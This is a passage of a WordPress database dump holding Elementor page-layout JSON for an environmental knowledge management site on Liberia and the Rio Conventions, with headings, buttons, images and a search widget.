fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6071,547,'_elementor_version','2.7.5'),(6072,547,'_elementor_template_type','wp-page'),(6073,547,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6077,548,'_wp_page_template','default'),(6078,548,'_elementor_edit_mode','builder'),(6079,548,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting 